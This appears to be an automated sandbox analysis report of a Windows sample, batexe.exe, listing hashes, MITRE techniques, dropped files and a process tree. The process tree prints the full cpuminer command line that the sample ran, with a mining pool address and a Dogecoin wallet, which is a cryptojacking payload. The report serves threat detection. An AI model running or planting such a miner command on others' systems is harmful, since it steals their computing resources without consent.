73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
296s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 03:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
408	b2e.exe
1584	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe
1584	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3008-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 408	3008	batexe.exe	84
PID 3008 wrote to memory of 408	3008	batexe.exe	84
PID 3008 wrote to memory of 408	3008	batexe.exe	84
PID 408 wrote to memory of 740	408	b2e.exe	85
PID 408 wrote to memory of 740	408	b2e.exe	85
PID 408 wrote to memory of 740	408	b2e.exe	85
PID 740 wrote to memory of 1584	740	cmd.exe	88
PID 740 wrote to memory of 1584	740	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6699.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:740
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe

Filesize
7.6MB

MD5
25f3fd58aa0d9c3e44d16fa2c30da215

SHA1
7df69488ddb8144707d3aaa3204fb4136ee7fc3f

SHA256
8ca3b5d0c17581f1a646080f692b88fd61487d9c246146919309faf32189a14f

SHA512
0ae6eff7dcb810034d289486a7a562ff3a00890a2cdc943d5068baf276d979c92f5f8461271cb79945a5e5aa0797291f27b99522ccda51e58f21074b47c242b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe

Filesize
884KB

MD5
7b317ebcb69696c9e218615be034d93b

SHA1
54ba28679861c05db7d181e7d0ba0829068603d6

SHA256
4717f2ab485649a15943c922df1b970fa9ff11243abbd2c06d7491997f7c55cc

SHA512
620e9c617a8d26d2fb27af2e6bbc7d955456c606589363267959847f1515836a437ce01ee275846f1ab353b77f9a32924a44ee27bc434cbbe0407175d3af5b62

Download Submit
C:\Users\Admin\AppData\Local\Temp\636D.tmp\b2e.exe

Filesize
1.4MB

MD5
c5e09858066f182b7f5bdcb61d9b36fc

SHA1
7a1de79ffcfa17a7a86a01f8d5046eaf970b8905

SHA256
b5ede4ee58898940fa268a8aa17da9fc31eae634a8c95afcb2412ae199e8f4b6

SHA512
70e4e7cf5ec9df418480b0773c325e489749cbf6b5af491b24f6a6b2298cb043f681689531e70666787d42723d096d57012f1bccf317367908ce68a1420a6dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\6699.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
196820fce0b9191d75c53fbeba30e1f7

SHA1
a52d189832e7047d615850176301bb76d80eac5b

SHA256
ecd33f72ed366e949d2847a651d77c0c5b06b9862278c44b19ad6fb3feb9a500

SHA512
d1d4f3cefe7d65480b7305d9ce4dded2fbc42305a5b2d35aee4a1f962f96433924717ab88def221597821844c9bc116b9b9274e918c46c974eca54944c7a8954

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
c69e2042586ea4235b340a3303de9d71

SHA1
32049e0827718165574c50a3db6854e70fcf2f8f

SHA256
3fbaf3e17d2643eaa852deaf9fa7ee2b9c78eece2d9882a7050f17feba7196b1

SHA512
e7425359a5318d1c37ba45b9e62dc39f221ec8d52d3b63417ea890b6bd10f23fe32c729449843b3db1ef375fbb0f00df4f46305527d4900f7da3a3a014a86671

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
6fbc1dd5a673fb82e7c6d86a498d1b11

SHA1
1a474b1b375da9f55f1a2de4a23bf14631f3a607

SHA256
c6874529111fadece322602fe7c2b0fad2b9e2745ed46323e07e7c83fc0876e6

SHA512
475c9af31396eb5343e298c92da5216a4ad40ac4a59687f32d15e8a402b2a9449bc4cf7c6358104e2b4f9b380171c8221e8bf3c3751de8852ccb6bb47b6162e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1005KB

MD5
5b2f89d7e2e6f937d173ae732cac7f3c

SHA1
af8853f9408b5b8ee15dea311448d2f12c834d21

SHA256
7b1660d06b0937c6f07750f413fbc15ccd2e1ef9a7fc85c040cac1100e104dd5

SHA512
5c0227b8c7c84bed9e2bf3de107aad4badfdfa65be4570e219836e0eef6def5e621be056aade92720f9e0192b5831a8c251434496a4ad499dd185ab4219dfa4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
23ebe3b030274cb3979d0c61b2dc40e1

SHA1
313fb26e539ce197adeec39c2e972b2cee0e5279

SHA256
ee09637aad9b626dcac6b8841980d8d080d8aa7c2146e8268f39fd4452898436

SHA512
b17f9f6e5cd861b3027865c43a41ba051f96c5692355580afbd9b68f3008d630056e4b887f3a40bd1309e8ee12f163b46d4c9795c1e453c372a4cea1bf91231a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
f652e97f88fe336e06a395d33985ecb8

SHA1
b6a54dec292aa80244997703b459a0c7162b2411

SHA256
d2e230ec86f8174c304a3f387e86304c6eecff0d1b9976363f405b8ec2bff3eb

SHA512
9257991cd90e3f06574034343dbf9efafa51d8f41ebbfde9dc2bb7374725005c871ee187e053469dd8ec50f60c5790af37a2c05062377adc99d1d69f5fb12788

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/408-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/408-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1584-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1584-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-45-0x00000000598A0000-0x0000000059938000-memory.dmp

Filesize
608KB

Download
memory/1584-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1584-47-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/1584-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1584-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3008-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download